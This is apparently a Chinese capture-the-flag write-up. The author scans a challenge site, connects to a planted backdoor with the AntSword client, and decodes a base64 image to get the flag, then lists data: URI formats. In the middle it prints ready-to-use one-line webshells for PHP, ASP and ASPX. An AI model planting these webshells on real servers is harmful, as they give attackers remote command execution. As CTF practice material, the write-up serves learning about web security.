进入题目环境
用dirsearch扫一下
访问 /index.php
由弹窗内容可以联想到一句话木马
<?php @eval($_POST['cmd']);?>
常见一句话木马
php的一句话木马: <?php @eval($_POST['shell']);?>
asp的一句话是: <%eval request ("shell")%>
aspx的一句话是: <%@ Page Language="Jscript"%>
<%eval(Request.Item["shell"],"unsafe");%>
蚁剑连接
目录下发现一个.txt 文件
下载该文件
得到很长的一段结尾是等号的字符串,我开始还用base64解码解不出来,真的是蠢,flag哪有那么长,这肯定是一张图片的base64编码呀,写个img标签就能解决(学会新技能了0.0)
吐槽一下,每一次做的题里面,都有上面这样的图片,难道是因为CTF界盛产二次元?(不过,,,真的好看0.0)
img标签的其他格式
data:,文本数据
data:text/plain,文本数据
data:text/html,HTML代码
data:text/html;base64,base64编码的HTML代码
data:text/css,CSS代码
data:text/css;base64,base64编码的CSS代码
data:text/javascript,Javascript代码
data:text/javascript;base64,base64编码的Javascript代码
data:image/gif;base64,base64编码的gif图片数据
data:image/png;base64,base64编码的png图片数据
data:image/jpeg;base64,base64编码的jpeg图片数据
data:image/x-icon;base64,base64编码的icon图片数据